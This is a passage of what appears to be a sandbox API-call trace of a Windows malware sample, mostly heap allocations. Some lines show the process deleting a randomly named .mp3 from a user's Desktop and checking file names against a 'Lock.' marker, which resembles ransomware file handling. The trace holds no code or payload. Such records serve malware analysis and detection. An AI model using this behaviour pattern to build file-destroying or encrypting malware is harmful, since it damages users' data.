Size=0x4) returned 0x2e54ec8 [0211.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0211.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0211.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0211.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0211.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0211.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0211.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0211.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0211.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0211.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0211.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0211.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0211.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0211.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0211.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0211.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0211.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0211.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0211.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0211.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0211.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0211.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0211.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0211.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0211.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0211.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0211.762] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0211.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0211.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0211.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff80 [0211.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0211.762] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0211.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff80 | out: hHeap=0x970000) returned 1 [0211.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0211.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50710 [0211.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0211.763] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0211.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0211.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0211.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0211.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0211.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0211.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0211.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0211.763] FreeLibrary (hLibModule=0x756e0000) returned 1 [0211.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0211.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0211.763] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0211.816] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0211.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0211.817] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0211.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0211.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0211.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0211.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0211.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0211.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0211.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0211.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0211.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50650 [0211.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50590 [0211.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50638 [0211.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0211.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504b8 [0211.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0211.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0211.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505a8 [0211.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0211.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0211.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0211.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0211.818] CloseHandle (hObject=0x2a0) returned 1 [0211.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0211.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0211.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04008 | out: hHeap=0x970000) returned 1 [0211.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0211.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0211.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0211.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0211.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0211.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0211.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0211.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0211.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0211.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0211.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0211.819] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0211.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0211.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0211.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0211.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0211.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0211.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0211.820] CloseHandle (hObject=0x2d0) returned 1 [0211.825] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0211.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0211.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0211.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0211.828] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0211.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0211.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0211.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0211.828] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf560 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0211.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0211.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc70 [0211.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0211.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0211.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0211.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0211.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0211.828] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/WUNf8 S 6YDp2i.mp3", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\WUNf8 S 6YDp2i.mp3", lpFilePart=0x8cedf4*="WUNf8 S 6YDp2i.mp3") returned 0x2a [0211.828] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\WUNf8 S 6YDp2i.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\wunf8 s 6ydp2i.mp3")) returned 0x20 [0211.829] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\WUNf8 S 6YDp2i.mp3", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x437dfc90, ftCreationTime.dwHighDateTime=0x1d5e62b, ftLastAccessTime.dwLowDateTime=0xae61bd70, ftLastAccessTime.dwHighDateTime=0x1d5f126, ftLastWriteTime.dwLowDateTime=0xae61bd70, ftLastWriteTime.dwHighDateTime=0x1d5f126, nFileSizeHigh=0x0, nFileSizeLow=0x12cf6, dwReserved0=0xfffffffc, dwReserved1=0x8cf25c, cFileName="WUNf8 S 6YDp2i.mp3", cAlternateFileName="WUNF8S~1.MP3")) returned 0xa87110 [0211.829] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\WUNf8 S 6YDp2i.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\wunf8 s 6ydp2i.mp3")) returned 1 [0211.899] FindNextFileW (in: hFindFile=0xa87110, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x437dfc90, ftCreationTime.dwHighDateTime=0x1d5e62b, ftLastAccessTime.dwLowDateTime=0xae61bd70, ftLastAccessTime.dwHighDateTime=0x1d5f126, ftLastWriteTime.dwLowDateTime=0xae61bd70, ftLastWriteTime.dwHighDateTime=0x1d5f126, nFileSizeHigh=0x0, nFileSizeLow=0x12cf6, dwReserved0=0xfffffffc, dwReserved1=0x8cf25c, cFileName="WUNf8 S 6YDp2i.mp3", cAlternateFileName="WUNF8S~1.MP3")) returned 0 [0211.899] FindClose (in: hFindFile=0xa87110 | out: hFindFile=0xa87110) returned 1 [0211.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0211.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0211.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53920 | out: hHeap=0x970000) returned 1 [0211.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0211.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0211.899] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0211.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0211.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0211.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0211.900] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf560 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0211.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0211.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc00 [0211.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0211.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0211.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0211.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0211.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0211.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc00 | out: hHeap=0x970000) returned 1 [0211.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0211.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0211.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0211.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0211.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0211.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0211.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0211.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0211.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0211.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0211.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0211.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x56) returned 0x2e563a8 [0211.901] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/WUNf8 S 6YDp2i.mp3", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\WUNf8 S 6YDp2i.mp3", lpFilePart=0x8cf650*="WUNf8 S 6YDp2i.mp3") returned 0x2a [0211.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563a8 | out: hHeap=0x970000) returned 1 [0211.901] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\WUNf8 S 6YDp2i.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\wunf8 s 6ydp2i.mp3")) returned 0xffffffff [0211.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0211.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0211.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0211.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0211.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53890 | out: hHeap=0x970000) returned 1 [0211.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0211.901] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0211.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0211.901] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0211.901] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0211.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0211.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0211.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0211.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0211.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0211.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0211.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0211.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0211.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0211.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0211.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0211.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0211.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0211.904] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xTq6MCScdpqJ.odt", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0211.904] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Tq6MCScdpqJ.odt", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0211.904] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="q6MCScdpqJ.odt", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0211.904] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6MCScdpqJ.odt", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0211.904] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MCScdpqJ.odt", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0211.904] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CScdpqJ.odt", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0211.904] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ScdpqJ.odt", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0211.904] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cdpqJ.odt", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0211.904] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dpqJ.odt", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0211.904] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pqJ.odt", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0211.904] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qJ.odt", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0211.904] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="J.odt", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0211.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53878 | out: hHeap=0x970000) returned 1 [0211.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0211.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0211.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53938 | out: hHeap=0x970000) returned 1 [0211.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0211.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0211.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0211.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0211.905] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0211.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0211.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0211.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0211.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0211.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0211.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0211.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0211.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0211.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0211.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0211.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0211.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0211.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0211.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0211.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0211.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0211.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0211.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0211.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x22) returned 0x977bd8 [0211.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 